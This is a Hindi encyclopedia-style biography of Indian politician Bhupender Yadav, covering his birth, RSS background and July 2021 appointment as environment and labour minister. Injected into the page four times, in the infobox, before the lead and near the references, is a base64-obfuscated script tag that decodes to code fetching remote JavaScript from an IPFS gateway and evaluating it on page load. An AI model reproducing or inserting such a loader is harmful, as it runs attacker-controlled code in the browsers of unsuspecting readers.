भूपेन्द्र यादव
भूपेन्द्र यादव
| |
पूरा नाम | भूपेन्द्र यादव |
जन्म | 30 जून, 1969 |
जन्म भूमि | जमालपुर, गुरुग्राम, हरियाणा |
नागरिकता | भारतीय |
प्रसिद्धि | राजनीतिज्ञ |
पार्टी | भारतीय जनता पार्टी |
पद | मंत्रालय या पर्यावरण, वन और जलवायु परिवर्तन- 7 जुलाई, 2021 से |
संबंधित लेख | भारतीय जनता पार्टी, नरेन्द्र मोदी का मंत्रिमण्डल |
अन्य जानकारी | राज्यसभा सदस्य भूपेन्द्र यादव मोदी सरकार में यादव समुदाय से पहले कैबिनेट मंत्री हैं। |
अद्यतन | 14:18, 12 जुलाई 2021 (IST) <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
|
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>भूपेन्द्र यादव (अंग्रेज़ी: Bhupender Yadav, जन्म- 30 जून, 1969, गुरुग्राम, हरियाणा) भारतीय राजनीतिज्ञ और राज्य सभा के सांसद हैं। वह देश के बड़े राजनीतिक दल भारतीय जनता पार्टी के राजनेता है। 7 जुलाई, 2021 को मोदी मंत्रिमंडल के विस्तार और उसमें फेरबदल के बाद भूपेन्द्र यादव को 'पर्यावरण, वन और जलवायु परिवर्तन मंत्रालय' तथा 'श्रम और रोजगार मंत्रालय' का दायित्व दिया गया है।
परिचय
भूपेन्द्र यादव का जन्म 30 जून, 1969 जमालपुर, गुरुग्राम (हरियाणा) में हुआ था।
राजस्थान के अजमेर में पले-बढ़े और गुरुग्राम जिले के गांव जमालपुर के मूल निवासी भूपेन्द्र यादव का मंत्री बनना कई मायनों में अहम है। प्रधानमंत्री नरेंद्र मोदी ने भूपेन्द्र यादव को कैबिनेट मंत्री बनाकर बड़ा राजनीतिक संदेश दिया है। 'राष्ट्रीय स्वयंसेवक संघ' के साधारण कार्यकर्ता से केंद्रीय मंत्री बनने तक का उनका सफरनामा प्रेरक है। उन्हें राजनीति विरासत में नहीं मिली, बल्कि परिश्रम के बल पर आसमान की ऊंची उड़ान भरी है।[1]
कैबिनेट मंत्री
राज्यसभा सदस्य भूपेन्द्र यादव मोदी सरकार में यादव समुदाय से पहले कैबिनेट मंत्री हैं। हालांकि अहीर/यादव समाज के विभिन्न संगठनों से जुड़े कुछ लोग मोदी सरकार में श्रम मंत्री रहे। हरियाणा के नवनियुक्त राज्यपाल बंडारू दत्तात्रेय को भी यादव मानते हैं। दत्तात्रेय को यादव मानने वालों की नजर में भूपेन्द्र यादव मोदी सरकार में दूसरे यादव कैबिनेट मंत्री हैं। राजनीतिक अर्थों में देखें तो उनकी नियुक्ति से दो राज्यों को प्रतिनिधित्व मिला है। राजस्थान से राज्यसभा में पहुंचे भूपेन्द्र यादव का अजमेर में घर है, जबकि गुरुग्राम के जमालपुर गांव में उनकी पैतृक हवेली है। कुछ दिन पूर्व ही इस हवेली में उन्हाेंने पुस्तकालय की स्थापना की थी और अमित शाह के हाथों इसका उद्घाटन करवाया था।
राजनीतिक चर्चा
भूपेन्द्र यादव ने बेशक अधिकांश समय खुद को हरियाणा की राजनीति से अलग रखा है, मगर यहां के राजनीति गलियारों में चलने वाली चर्चाओं से वह कभी अलग नहीं हुए। पहली पारी में जब मनोहरलाल के विकल्प की बातें चली तब भूपेन्द्र यादव को मुख्यमंत्री बनाए जाने की चर्चाएं भी कई दिन हवा में तैरती रही।[1]
|
|
|
|
|
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
टीका टिप्पणी और संदर्भ
- ↑ 1.0 1.1 यादव समुदाय से कौन बना मोदी कैबिनेट में केंद्रीय मंत्री (हिंदी) jagran.com। अभिगमन तिथि: 12 जुलाई, 2021।
संबंधित लेख
नरेन्द्र मोदी का कैबिनेट मंत्रिमण्डल
क्रमांक | मंत्री नाम | मंत्रालय |
---|